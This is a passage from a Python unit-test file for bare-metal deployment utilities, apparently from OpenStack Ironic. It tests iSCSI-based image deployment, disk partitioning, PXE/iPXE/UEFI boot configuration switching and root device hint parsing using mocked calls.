:boot_whole_disk
kernel chain.c32
append mbr:{{ DISK_IDENTIFIER }}
boot
"""
_IPXECONF_BOOT_PARTITION = """
#!ipxe
dhcp
goto boot_partition
:deploy
kernel deploy_kernel
initrd deploy_ramdisk
boot
:boot_partition
kernel kernel
append initrd=ramdisk root=UUID=12345678-1234-1234-1234-1234567890abcdef
boot
:boot_whole_disk
kernel chain.c32
append mbr:{{ DISK_IDENTIFIER }}
boot
"""
_IPXECONF_BOOT_WHOLE_DISK = """
#!ipxe
dhcp
goto boot_whole_disk
:deploy
kernel deploy_kernel
initrd deploy_ramdisk
boot
:boot_partition
kernel kernel
append initrd=ramdisk root={{ ROOT }}
boot
:boot_whole_disk
kernel chain.c32
append mbr:0x12345678
boot
"""
_UEFI_PXECONF_DEPLOY = b"""
default=deploy
image=deploy_kernel
label=deploy
initrd=deploy_ramdisk
append="ro text"
image=kernel
label=boot_partition
initrd=ramdisk
append="root={{ ROOT }}"
image=chain.c32
label=boot_whole_disk
append="mbr:{{ DISK_IDENTIFIER }}"
"""
_UEFI_PXECONF_BOOT_PARTITION = """
default=boot_partition
image=deploy_kernel
label=deploy
initrd=deploy_ramdisk
append="ro text"
image=kernel
label=boot_partition
initrd=ramdisk
append="root=UUID=12345678-1234-1234-1234-1234567890abcdef"
image=chain.c32
label=boot_whole_disk
append="mbr:{{ DISK_IDENTIFIER }}"
"""
_UEFI_PXECONF_BOOT_WHOLE_DISK = """
default=boot_whole_disk
image=deploy_kernel
label=deploy
initrd=deploy_ramdisk
append="ro text"
image=kernel
label=boot_partition
initrd=ramdisk
append="root={{ ROOT }}"
image=chain.c32
label=boot_whole_disk
append="mbr:0x12345678"
"""
@mock.patch.object(time, 'sleep', lambda seconds: None)
class PhysicalWorkTestCase(tests_base.TestCase):
def _mock_calls(self, name_list):
patch_list = [mock.patch.object(utils, name,
spec_set=types.FunctionType)
for name in name_list]
mock_list = [patcher.start() for patcher in patch_list]
for patcher in patch_list:
self.addCleanup(patcher.stop)
parent_mock = mock.MagicMock(spec=[])
for mocker, name in zip(mock_list, name_list):
parent_mock.attach_mock(mocker, name)
return parent_mock
def _test_deploy_partition_image(self, boot_option=None, boot_mode=None):
"""Check loosely all functions are called with right args."""
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
image_path = '/tmp/xyz/image'
root_mb = 128
swap_mb = 64
ephemeral_mb = 0
ephemeral_format = None
configdrive_mb = 0
node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
dev = '/dev/fake'
swap_part = '/dev/fake-part1'
root_part = '/dev/fake-part2'
root_uuid = '12345678-1234-1234-12345678-12345678abcdef'
name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi',
'logout_iscsi', 'delete_iscsi', 'make_partitions',
'is_block_device', 'populate_image', 'mkfs',
'block_uuid', 'notify', 'destroy_disk_metadata']
parent_mock = self._mock_calls(name_list)
parent_mock.get_dev.return_value = dev
parent_mock.get_image_mb.return_value = 1
parent_mock.is_block_device.return_value = True
parent_mock.block_uuid.return_value = root_uuid
parent_mock.make_partitions.return_value = {'root': root_part,
'swap': swap_part}
make_partitions_expected_args = [dev, root_mb, swap_mb, ephemeral_mb,
configdrive_mb]
make_partitions_expected_kwargs = {'commit': True}
deploy_kwargs = {}
if boot_option:
make_partitions_expected_kwargs['boot_option'] = boot_option
deploy_kwargs['boot_option'] = boot_option
else:
make_partitions_expected_kwargs['boot_option'] = 'netboot'
if boot_mode:
make_partitions_expected_kwargs['boot_mode'] = boot_mode
deploy_kwargs['boot_mode'] = boot_mode
else:
make_partitions_expected_kwargs['boot_mode'] = 'bios'
# If no boot_option, then it should default to netboot.
calls_expected = [mock.call.get_image_mb(image_path),
mock.call.get_dev(address, port, iqn, lun),
mock.call.discovery(address, port),
mock.call.login_iscsi(address, port, iqn),
mock.call.is_block_device(dev),
mock.call.destroy_disk_metadata(dev, node_uuid),
mock.call.make_partitions(
*make_partitions_expected_args,
**make_partitions_expected_kwargs),
mock.call.is_block_device(root_part),
mock.call.is_block_device(swap_part),
mock.call.populate_image(image_path, root_part),
mock.call.mkfs(dev=swap_part, fs='swap',
label='swap1'),
mock.call.block_uuid(root_part),
mock.call.logout_iscsi(address, port, iqn),
mock.call.delete_iscsi(address, port, iqn)]
uuids_dict_returned = utils.deploy_partition_image(
address, port, iqn, lun, image_path, root_mb, swap_mb,
ephemeral_mb, ephemeral_format, node_uuid, **deploy_kwargs)
self.assertEqual(calls_expected, parent_mock.mock_calls)
expected_uuid_dict = {
'root uuid': root_uuid,
'efi system partition uuid': None}
self.assertEqual(expected_uuid_dict, uuids_dict_returned)
def test_deploy_partition_image_without_boot_option(self):
self._test_deploy_partition_image()
def test_deploy_partition_image_netboot(self):
self._test_deploy_partition_image(boot_option="netboot")
def test_deploy_partition_image_localboot(self):
self._test_deploy_partition_image(boot_option="local")
def test_deploy_partition_image_wo_boot_option_and_wo_boot_mode(self):
self._test_deploy_partition_image()
def test_deploy_partition_image_netboot_bios(self):
self._test_deploy_partition_image(boot_option="netboot",
boot_mode="bios")
def test_deploy_partition_image_localboot_bios(self):
self._test_deploy_partition_image(boot_option="local",
boot_mode="bios")
def test_deploy_partition_image_netboot_uefi(self):
self._test_deploy_partition_image(boot_option="netboot",
boot_mode="uefi")
@mock.patch.object(utils, 'get_image_mb', return_value=129, autospec=True)
def test_deploy_partition_image_image_exceeds_root_partition(self,
gim_mock):
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
image_path = '/tmp/xyz/image'
root_mb = 128
swap_mb = 64
ephemeral_mb = 0
ephemeral_format = None
node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
self.assertRaises(exception.InstanceDeployFailure,
utils.deploy_partition_image, address, port, iqn,
lun, image_path, root_mb, swap_mb, ephemeral_mb,
ephemeral_format, node_uuid)
gim_mock.assert_called_once_with(image_path)
# We mock utils.block_uuid separately here because we can't predict
# the order in which it will be called.
@mock.patch.object(utils, 'block_uuid', autospec=True)
def test_deploy_partition_image_localboot_uefi(self, block_uuid_mock):
"""Check loosely all functions are called with right args."""
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
image_path = '/tmp/xyz/image'
root_mb = 128
swap_mb = 64
ephemeral_mb = 0
ephemeral_format = None
configdrive_mb = 0
node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
dev = '/dev/fake'
swap_part = '/dev/fake-part2'
root_part = '/dev/fake-part3'
efi_system_part = '/dev/fake-part1'
root_uuid = '12345678-1234-1234-12345678-12345678abcdef'
efi_system_part_uuid = '9036-482'
name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi',
'logout_iscsi', 'delete_iscsi', 'make_partitions',
'is_block_device', 'populate_image', 'mkfs',
'notify', 'destroy_disk_metadata']
parent_mock = self._mock_calls(name_list)
parent_mock.get_dev.return_value = dev
parent_mock.get_image_mb.return_value = 1
parent_mock.is_block_device.return_value = True
def block_uuid_side_effect(device):
if device == root_part:
return root_uuid
if device == efi_system_part:
return efi_system_part_uuid
block_uuid_mock.side_effect = block_uuid_side_effect
parent_mock.make_partitions.return_value = {
'root': root_part, 'swap': swap_part,
'efi system partition': efi_system_part}
# If no boot_option, then it should default to netboot.
calls_expected = [mock.call.get_image_mb(image_path),
mock.call.get_dev(address, port, iqn, lun),
mock.call.discovery(address, port),
mock.call.login_iscsi(address, port, iqn),
mock.call.is_block_device(dev),
mock.call.destroy_disk_metadata(dev, node_uuid),
mock.call.make_partitions(dev, root_mb, swap_mb,
ephemeral_mb,
configdrive_mb,
commit=True,
boot_option="local",
boot_mode="uefi"),
mock.call.is_block_device(root_part),
mock.call.is_block_device(swap_part),
mock.call.is_block_device(efi_system_part),
mock.call.mkfs(dev=efi_system_part, fs='vfat',
label='efi-part'),
mock.call.populate_image(image_path, root_part),
mock.call.mkfs(dev=swap_part, fs='swap',
label='swap1'),
mock.call.logout_iscsi(address, port, iqn),
mock.call.delete_iscsi(address, port, iqn)]
uuid_dict_returned = utils.deploy_partition_image(
address, port, iqn, lun, image_path, root_mb, swap_mb,
ephemeral_mb, ephemeral_format, node_uuid, boot_option="local",
boot_mode="uefi")
self.assertEqual(calls_expected, parent_mock.mock_calls)
block_uuid_mock.assert_any_call('/dev/fake-part1')
block_uuid_mock.assert_any_call('/dev/fake-part3')
expected_uuid_dict = {
'root uuid': root_uuid,
'efi system partition uuid': efi_system_part_uuid}
self.assertEqual(expected_uuid_dict, uuid_dict_returned)
def test_deploy_partition_image_without_swap(self):
"""Check loosely all functions are called with right args."""
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
image_path = '/tmp/xyz/image'
root_mb = 128
swap_mb = 0
ephemeral_mb = 0
ephemeral_format = None
configdrive_mb = 0
node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
dev = '/dev/fake'
root_part = '/dev/fake-part1'
root_uuid = '12345678-1234-1234-12345678-12345678abcdef'
name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi',
'logout_iscsi', 'delete_iscsi', 'make_partitions',
'is_block_device', 'populate_image', 'block_uuid',
'notify', 'destroy_disk_metadata']
parent_mock = self._mock_calls(name_list)
parent_mock.get_dev.return_value = dev
parent_mock.get_image_mb.return_value = 1
parent_mock.is_block_device.return_value = True
parent_mock.block_uuid.return_value = root_uuid
parent_mock.make_partitions.return_value = {'root': root_part}
calls_expected = [mock.call.get_image_mb(image_path),
mock.call.get_dev(address, port, iqn, lun),
mock.call.discovery(address, port),
mock.call.login_iscsi(address, port, iqn),
mock.call.is_block_device(dev),
mock.call.destroy_disk_metadata(dev, node_uuid),
mock.call.make_partitions(dev, root_mb, swap_mb,
ephemeral_mb,
configdrive_mb,
commit=True,
boot_option="netboot",
boot_mode="bios"),
mock.call.is_block_device(root_part),
mock.call.populate_image(image_path, root_part),
mock.call.block_uuid(root_part),
mock.call.logout_iscsi(address, port, iqn),
mock.call.delete_iscsi(address, port, iqn)]
uuid_dict_returned = utils.deploy_partition_image(address, port, iqn,
lun, image_path,
root_mb, swap_mb,
ephemeral_mb,
ephemeral_format,
node_uuid)
self.assertEqual(calls_expected, parent_mock.mock_calls)
self.assertEqual(root_uuid, uuid_dict_returned['root uuid'])
def test_deploy_partition_image_with_ephemeral(self):
"""Check loosely all functions are called with right args."""
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
image_path = '/tmp/xyz/image'
root_mb = 128
swap_mb = 64
ephemeral_mb = 256
configdrive_mb = 0
ephemeral_format = 'exttest'
node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
dev = '/dev/fake'
ephemeral_part = '/dev/fake-part1'
swap_part = '/dev/fake-part2'
root_part = '/dev/fake-part3'
root_uuid = '12345678-1234-1234-12345678-12345678abcdef'
name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi',
'logout_iscsi', 'delete_iscsi', 'make_partitions',
'is_block_device', 'populate_image', 'mkfs',
'block_uuid', 'notify', 'destroy_disk_metadata']
parent_mock = self._mock_calls(name_list)
parent_mock.get_dev.return_value = dev
parent_mock.get_image_mb.return_value = 1
parent_mock.is_block_device.return_value = True
parent_mock.block_uuid.return_value = root_uuid
parent_mock.make_partitions.return_value = {'swap': swap_part,
'ephemeral': ephemeral_part,
'root': root_part}
calls_expected = [mock.call.get_image_mb(image_path),
mock.call.get_dev(address, port, iqn, lun),
mock.call.discovery(address, port),
mock.call.login_iscsi(address, port, iqn),
mock.call.is_block_device(dev),
mock.call.destroy_disk_metadata(dev, node_uuid),
mock.call.make_partitions(dev, root_mb, swap_mb,
ephemeral_mb,
configdrive_mb,
commit=True,
boot_option="netboot",
boot_mode="bios"),
mock.call.is_block_device(root_part),
mock.call.is_block_device(swap_part),
mock.call.is_block_device(ephemeral_part),
mock.call.populate_image(image_path, root_part),
mock.call.mkfs(dev=swap_part, fs='swap',
label='swap1'),
mock.call.mkfs(dev=ephemeral_part,
fs=ephemeral_format,
label='ephemeral0'),
mock.call.block_uuid(root_part),
mock.call.logout_iscsi(address, port, iqn),
mock.call.delete_iscsi(address, port, iqn)]
uuid_dict_returned = utils.deploy_partition_image(address, port, iqn,
lun, image_path,
root_mb, swap_mb,
ephemeral_mb,
ephemeral_format,
node_uuid)
self.assertEqual(calls_expected, parent_mock.mock_calls)
self.assertEqual(root_uuid, uuid_dict_returned['root uuid'])
def test_deploy_partition_image_preserve_ephemeral(self):
"""Check if all functions are called with right args."""
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
image_path = '/tmp/xyz/image'
root_mb = 128
swap_mb = 64
ephemeral_mb = 256
ephemeral_format = 'exttest'
configdrive_mb = 0
node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
dev = '/dev/fake'
ephemeral_part = '/dev/fake-part1'
swap_part = '/dev/fake-part2'
root_part = '/dev/fake-part3'
root_uuid = '12345678-1234-1234-12345678-12345678abcdef'
name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi',
'logout_iscsi', 'delete_iscsi', 'make_partitions',
'is_block_device', 'populate_image', 'mkfs',
'block_uuid', 'notify', 'get_dev_block_size']
parent_mock = self._mock_calls(name_list)
parent_mock.get_dev.return_value = dev
parent_mock.get_image_mb.return_value = 1
parent_mock.is_block_device.return_value = True
parent_mock.block_uuid.return_value = root_uuid
parent_mock.make_partitions.return_value = {'swap': swap_part,
'ephemeral': ephemeral_part,
'root': root_part}
parent_mock.block_uuid.return_value = root_uuid
calls_expected = [mock.call.get_image_mb(image_path),
mock.call.get_dev(address, port, iqn, lun),
mock.call.discovery(address, port),
mock.call.login_iscsi(address, port, iqn),
mock.call.is_block_device(dev),
mock.call.make_partitions(dev, root_mb, swap_mb,
ephemeral_mb,
configdrive_mb,
commit=False,
boot_option="netboot",
boot_mode="bios"),
mock.call.is_block_device(root_part),
mock.call.is_block_device(swap_part),
mock.call.is_block_device(ephemeral_part),
mock.call.populate_image(image_path, root_part),
mock.call.mkfs(dev=swap_part, fs='swap',
label='swap1'),
mock.call.block_uuid(root_part),
mock.call.logout_iscsi(address, port, iqn),
mock.call.delete_iscsi(address, port, iqn)]
uuid_dict_returned = utils.deploy_partition_image(
address, port, iqn, lun, image_path, root_mb, swap_mb,
ephemeral_mb, ephemeral_format, node_uuid,
preserve_ephemeral=True, boot_option="netboot")
self.assertEqual(calls_expected, parent_mock.mock_calls)
self.assertFalse(parent_mock.get_dev_block_size.called)
self.assertEqual(root_uuid, uuid_dict_returned['root uuid'])
@mock.patch.object(common_utils, 'unlink_without_raise', autospec=True)
def test_deploy_partition_image_with_configdrive(self, mock_unlink):
"""Check loosely all functions are called with right args."""
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
image_path = '/tmp/xyz/image'
root_mb = 128
swap_mb = 0
ephemeral_mb = 0
configdrive_mb = 10
ephemeral_format = None
node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
configdrive_url = 'http://127.0.0.1/cd'
dev = '/dev/fake'
configdrive_part = '/dev/fake-part1'
root_part = '/dev/fake-part2'
root_uuid = '12345678-1234-1234-12345678-12345678abcdef'
name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi',
'logout_iscsi', 'delete_iscsi', 'make_partitions',
'is_block_device', 'populate_image', 'block_uuid',
'notify', 'destroy_disk_metadata', 'dd',
'_get_configdrive']
parent_mock = self._mock_calls(name_list)
parent_mock.get_dev.return_value = dev
parent_mock.get_image_mb.return_value = 1
parent_mock.is_block_device.return_value = True
parent_mock.block_uuid.return_value = root_uuid
parent_mock.make_partitions.return_value = {'root': root_part,
'configdrive':
configdrive_part}
parent_mock._get_configdrive.return_value = (10, 'configdrive-path')
calls_expected = [mock.call.get_image_mb(image_path),
mock.call.get_dev(address, port, iqn, lun),
mock.call.discovery(address, port),
mock.call.login_iscsi(address, port, iqn),
mock.call.is_block_device(dev),
mock.call.destroy_disk_metadata(dev, node_uuid),
mock.call._get_configdrive(configdrive_url,
node_uuid),
mock.call.make_partitions(dev, root_mb, swap_mb,
ephemeral_mb,
configdrive_mb,
commit=True,
boot_option="netboot",
boot_mode="bios"),
mock.call.is_block_device(root_part),
mock.call.is_block_device(configdrive_part),
mock.call.dd(mock.ANY, configdrive_part),
mock.call.populate_image(image_path, root_part),
mock.call.block_uuid(root_part),
mock.call.logout_iscsi(address, port, iqn),
mock.call.delete_iscsi(address, port, iqn)]
uuid_dict_returned = utils.deploy_partition_image(
address, port, iqn, lun, image_path, root_mb, swap_mb,
ephemeral_mb, ephemeral_format, node_uuid,
configdrive=configdrive_url)
self.assertEqual(calls_expected, parent_mock.mock_calls)
self.assertEqual(root_uuid, uuid_dict_returned['root uuid'])
mock_unlink.assert_called_once_with('configdrive-path')
@mock.patch.object(utils, 'get_disk_identifier', autospec=True)
def test_deploy_whole_disk_image(self, mock_gdi):
"""Check loosely all functions are called with right args."""
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
image_path = '/tmp/xyz/image'
node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
dev = '/dev/fake'
name_list = ['get_dev', 'discovery', 'login_iscsi', 'logout_iscsi',
'delete_iscsi', 'is_block_device', 'populate_image',
'notify']
parent_mock = self._mock_calls(name_list)
parent_mock.get_dev.return_value = dev
parent_mock.is_block_device.return_value = True
mock_gdi.return_value = '0x12345678'
calls_expected = [mock.call.get_dev(address, port, iqn, lun),
mock.call.discovery(address, port),
mock.call.login_iscsi(address, port, iqn),
mock.call.is_block_device(dev),
mock.call.populate_image(image_path, dev),
mock.call.logout_iscsi(address, port, iqn),
mock.call.delete_iscsi(address, port, iqn)]
uuid_dict_returned = utils.deploy_disk_image(address, port, iqn, lun,
image_path, node_uuid)
self.assertEqual(calls_expected, parent_mock.mock_calls)
self.assertEqual('0x12345678', uuid_dict_returned['disk identifier'])
@mock.patch.object(common_utils, 'execute', autospec=True)
def test_verify_iscsi_connection_raises(self, mock_exec):
iqn = 'iqn.xyz'
mock_exec.return_value = ['iqn.abc', '']
self.assertRaises(exception.InstanceDeployFailure,
utils.verify_iscsi_connection, iqn)
self.assertEqual(3, mock_exec.call_count)
@mock.patch.object(os.path, 'exists', autospec=True)
def test_check_file_system_for_iscsi_device_raises(self, mock_os):
iqn = 'iqn.xyz'
ip = "127.0.0.1"
port = "22"
mock_os.return_value = False
self.assertRaises(exception.InstanceDeployFailure,
utils.check_file_system_for_iscsi_device, ip, port, iqn)
self.assertEqual(3, mock_os.call_count)
@mock.patch.object(os.path, 'exists', autospec=True)
def test_check_file_system_for_iscsi_device(self, mock_os):
iqn = 'iqn.xyz'
ip = "127.0.0.1"
port = "22"
check_dir = "/dev/disk/by-path/ip-%s:%s-iscsi-%s-lun-1" % (ip,
port,
iqn)
mock_os.return_value = True
utils.check_file_system_for_iscsi_device(ip, port, iqn)
mock_os.assert_called_once_with(check_dir)
@mock.patch.object(common_utils, 'execute', autospec=True)
def test_verify_iscsi_connection(self, mock_exec):
iqn = 'iqn.xyz'
mock_exec.return_value = ['iqn.xyz', '']
utils.verify_iscsi_connection(iqn)
mock_exec.assert_called_once_with('iscsiadm',
'-m', 'node',
'-S',
run_as_root=True,
check_exit_code=[0])
@mock.patch.object(common_utils, 'execute', autospec=True)
def test_force_iscsi_lun_update(self, mock_exec):
iqn = 'iqn.xyz'
utils.force_iscsi_lun_update(iqn)
mock_exec.assert_called_once_with('iscsiadm',
'-m', 'node',
'-T', iqn,
'-R',
run_as_root=True,
check_exit_code=[0])
@mock.patch.object(common_utils, 'execute', autospec=True)
@mock.patch.object(utils, 'verify_iscsi_connection', autospec=True)
@mock.patch.object(utils, 'force_iscsi_lun_update', autospec=True)
@mock.patch.object(utils, 'check_file_system_for_iscsi_device',
autospec=True)
def test_login_iscsi_calls_verify_and_update(self,
mock_check_dev,
mock_update,
mock_verify,
mock_exec):
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
mock_exec.return_value = ['iqn.xyz', '']
utils.login_iscsi(address, port, iqn)
mock_exec.assert_called_once_with('iscsiadm',
'-m', 'node',
'-p', '%s:%s' % (address, port),
'-T', iqn,
'--login',
run_as_root=True,
check_exit_code=[0],
attempts=5,
delay_on_retry=True)
mock_verify.assert_called_once_with(iqn)
mock_update.assert_called_once_with(iqn)
mock_check_dev.assert_called_once_with(address, port, iqn)
@mock.patch.object(utils, 'is_block_device', lambda d: True)
def test_always_logout_and_delete_iscsi(self):
"""Check if logout_iscsi() and delete_iscsi() are called.
Make sure that logout_iscsi() and delete_iscsi() are called once
login_iscsi() is invoked.
"""
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
image_path = '/tmp/xyz/image'
root_mb = 128
swap_mb = 64
ephemeral_mb = 256
ephemeral_format = 'exttest'
node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
dev = '/dev/fake'
class TestException(Exception):
pass
name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi',
'logout_iscsi', 'delete_iscsi', 'work_on_disk']
patch_list = [mock.patch.object(utils, name,
spec_set=types.FunctionType)
for name in name_list]
mock_list = [patcher.start() for patcher in patch_list]
for patcher in patch_list:
self.addCleanup(patcher.stop)
parent_mock = mock.MagicMock(spec=[])
for mocker, name in zip(mock_list, name_list):
parent_mock.attach_mock(mocker, name)
parent_mock.get_dev.return_value = dev
parent_mock.get_image_mb.return_value = 1
parent_mock.work_on_disk.side_effect = TestException
calls_expected = [mock.call.get_image_mb(image_path),
mock.call.get_dev(address, port, iqn, lun),
mock.call.discovery(address, port),
mock.call.login_iscsi(address, port, iqn),
mock.call.work_on_disk(dev, root_mb, swap_mb,
ephemeral_mb,
ephemeral_format, image_path,
node_uuid, configdrive=None,
preserve_ephemeral=False,
boot_option="netboot",
boot_mode="bios"),
mock.call.logout_iscsi(address, port, iqn),
mock.call.delete_iscsi(address, port, iqn)]
self.assertRaises(TestException, utils.deploy_partition_image,
address, port, iqn, lun, image_path,
root_mb, swap_mb, ephemeral_mb, ephemeral_format,
node_uuid)
self.assertEqual(calls_expected, parent_mock.mock_calls)
class SwitchPxeConfigTestCase(tests_base.TestCase):
def _create_config(self, ipxe=False, boot_mode=None):
(fd, fname) = tempfile.mkstemp()
if boot_mode == 'uefi':
pxe_cfg = _UEFI_PXECONF_DEPLOY
else:
pxe_cfg = _IPXECONF_DEPLOY if ipxe else _PXECONF_DEPLOY
os.write(fd, pxe_cfg)
os.close(fd)
self.addCleanup(os.unlink, fname)
return fname
def test_switch_pxe_config_partition_image(self):
boot_mode = 'bios'
fname = self._create_config()
utils.switch_pxe_config(fname,
'12345678-1234-1234-1234-1234567890abcdef',
boot_mode,
False)
with open(fname, 'r') as f:
pxeconf = f.read()
self.assertEqual(_PXECONF_BOOT_PARTITION, pxeconf)
def test_switch_pxe_config_whole_disk_image(self):
boot_mode = 'bios'
fname = self._create_config()
utils.switch_pxe_config(fname,
'0x12345678',
boot_mode,
True)
with open(fname, 'r') as f:
pxeconf = f.read()
self.assertEqual(_PXECONF_BOOT_WHOLE_DISK, pxeconf)
def test_switch_ipxe_config_partition_image(self):
boot_mode = 'bios'
cfg.CONF.set_override('ipxe_enabled', True, 'pxe')
fname = self._create_config(ipxe=True)
utils.switch_pxe_config(fname,
'12345678-1234-1234-1234-1234567890abcdef',
boot_mode,
False)
with open(fname, 'r') as f:
pxeconf = f.read()
self.assertEqual(_IPXECONF_BOOT_PARTITION, pxeconf)
def test_switch_ipxe_config_whole_disk_image(self):
boot_mode = 'bios'
cfg.CONF.set_override('ipxe_enabled', True, 'pxe')
fname = self._create_config(ipxe=True)
utils.switch_pxe_config(fname,
'0x12345678',
boot_mode,
True)
with open(fname, 'r') as f:
pxeconf = f.read()
self.assertEqual(_IPXECONF_BOOT_WHOLE_DISK, pxeconf)
def test_switch_uefi_pxe_config_partition_image(self):
boot_mode = 'uefi'
fname = self._create_config(boot_mode=boot_mode)
utils.switch_pxe_config(fname,
'12345678-1234-1234-1234-1234567890abcdef',
boot_mode,
False)
with open(fname, 'r') as f:
pxeconf = f.read()
self.assertEqual(_UEFI_PXECONF_BOOT_PARTITION, pxeconf)
def test_switch_uefi_config_whole_disk_image(self):
boot_mode = 'uefi'
fname = self._create_config(boot_mode=boot_mode)
utils.switch_pxe_config(fname,
'0x12345678',
boot_mode,
True)
with open(fname, 'r') as f:
pxeconf = f.read()
self.assertEqual(_UEFI_PXECONF_BOOT_WHOLE_DISK, pxeconf)
@mock.patch('time.sleep', lambda sec: None)
class OtherFunctionTestCase(db_base.DbTestCase):
def setUp(self):
super(OtherFunctionTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake_pxe")
self.node = obj_utils.create_test_node(self.context, driver='fake_pxe')
def test_get_dev(self):
expected = '/dev/disk/by-path/ip-127.0.0.1:5678-iscsi-iqn.fake-lun-9'
actual = utils.get_dev('127.0.0.1', 5678, 'iqn.fake', 9)
self.assertEqual(expected, actual)
@mock.patch.object(os, 'stat', autospec=True)
@mock.patch.object(stat, 'S_ISBLK', autospec=True)
def test_is_block_device_works(self, mock_is_blk, mock_os):
device = '/dev/disk/by-path/ip-127.0.0.1:5678-iscsi-iqn.fake-lun-9'
mock_is_blk.return_value = True
mock_os().st_mode = 10000
self.assertTrue(utils.is_block_device(device))
mock_is_blk.assert_called_once_with(mock_os().st_mode)
@mock.patch.object(os, 'stat', autospec=True)
def test_is_block_device_raises(self, mock_os):
device = '/dev/disk/by-path/ip-127.0.0.1:5678-iscsi-iqn.fake-lun-9'
mock_os.side_effect = OSError
self.assertRaises(exception.InstanceDeployFailure,
utils.is_block_device, device)
mock_os.assert_has_calls([mock.call(device)] * 3)
@mock.patch.object(os.path, 'getsize', autospec=True)
@mock.patch.object(images, 'converted_size', autospec=True)
def test_get_image_mb(self, mock_csize, mock_getsize):
mb = 1024 * 1024
mock_getsize.return_value = 0
mock_csize.return_value = 0
self.assertEqual(0, utils.get_image_mb('x', False))
self.assertEqual(0, utils.get_image_mb('x', True))
mock_getsize.return_value = 1
mock_csize.return_value = 1
self.assertEqual(1, utils.get_image_mb('x', False))
self.assertEqual(1, utils.get_image_mb('x', True))
mock_getsize.return_value = mb
mock_csize.return_value = mb
self.assertEqual(1, utils.get_image_mb('x', False))
self.assertEqual(1, utils.get_image_mb('x', True))
mock_getsize.return_value = mb + 1
mock_csize.return_value = mb + 1
self.assertEqual(2, utils.get_image_mb('x', False))
self.assertEqual(2, utils.get_image_mb('x', True))
def test_parse_root_device_hints(self):
self.node.properties['root_device'] = {'wwn': 123456}
expected = 'wwn=123456'
result = utils.parse_root_device_hints(self.node)
self.assertEqual(expected, result)
def test_parse_root_device_hints_string_space(self):
self.node.properties['root_device'] = {'model': 'fake model'}
expected = 'model=fake%20model'
result = utils.parse_root_device_hints(self.node)
self.assertEqual(expected, result)
def test_parse_root_device_hints_no_hints(self):
self.node.properties = {}
result = utils.parse_root_device_hints(self.node)
self.assertIsNone(result)
def test_parse_root_device_hints_invalid_hints(self):
self.node.properties['root_device'] = {'vehicle': 'Owlship'}
self.assertRaises(exception.InvalidParameterValue,
utils.parse_root_device_hints, self.node)
def test_parse_root_device_hints_invalid_size(self):
self.node.properties['root_device'] = {'size': 'not-int'}
self.assertRaises(exception.InvalidParameterValue,
utils.parse_root_device_hints, self.node)
@mock.patch.object(disk_partitioner.DiskPartitioner, 'commit', lambda _: None)
class WorkOnDiskTestCase(tests_base.TestCase):
def setUp(self):
super(WorkOnDiskTestCase, self).setUp()
self.image_path = '/tmp/xyz/image'
self.root_mb = 128
self.swap_mb = 64
self.ephemeral_mb = 0
self.ephemeral_format = None
self.configdrive_mb = 0
self.dev = '/dev/fake'
self.swap_part = '/dev/fake-part1'
self.root_part = '/dev/fake-part2'
self.mock_ibd_obj = mock.patch.object(
utils, 'is_block_device', autospec=True)
self.mock_ibd = self.mock_ibd_obj.start()
self.addCleanup(self.mock_ibd_obj.stop)
self.mock_mp_obj = mock.patch.object(
utils, 'make_partitions', autospec=True)
self.mock_mp = self.mock_mp_obj.start()
self.addCleanup(self.mock_mp_obj.stop)
self.mock_remlbl_obj = mock.patch.object(
utils, 'destroy_disk_metadata', autospec=True)
self.mock_remlbl = self.mock_remlbl_obj.start()
self.addCleanup(self.mock_remlbl_obj.stop)
self.mock_mp.return_value = {'swap': self.swap_part,
'root': self.root_part}
def test_no_root_partition(self):
self.mock_ibd.return_value = False
self.assertRaises(exception.InstanceDeployFailure,
utils.work_on_disk, self.dev, self.root_mb,
self.swap_mb, self.ephemeral_mb,
self.ephemeral_format, self.image_path, 'fake-uuid')
self.mock_ibd.assert_called_once_with(self.root_part)
self.mock_mp.assert_called_once_with(self.dev, self.root_mb,
self.swap_mb, self.ephemeral_mb,
self.configdrive_mb, commit=True,
boot_option="netboot",
boot_mode="bios")
def test_no_swap_partition(self):
self.mock_ibd.side_effect = iter([True, False])
calls = [mock.call(self.root_part),
mock.call(self.swap_part)]
self.assertRaises(exception.InstanceDeployFailure,
utils.work_on_disk, self.dev, self.root_mb,
self.swap_mb, self.ephemeral_mb,
self.ephemeral_format, self.image_path, 'fake-uuid')
self.assertEqual(self.mock_ibd.call_args_list, calls)
self.mock_mp.assert_called_once_with(self.dev, self.root_mb,
self.swap_mb, self.ephemeral_mb,
self.configdrive_mb, commit=True,
boot_option="netboot",
boot_mode="bios")
def test_no_ephemeral_partition(self):
ephemeral_part = '/dev/fake-part1'
swap_part = '/dev/fake-part2'
root_part = '/dev/fake-part3'
ephemeral_mb = 256
ephemeral_format = 'exttest'
self.mock_mp.return_value = {'ephemeral': ephemeral_part,
'swap': swap_part,
'root': root_part}
self.mock_ibd.side_effect = iter([True, True, False])
calls = [mock.call(root_part),
mock.call(swap_part),
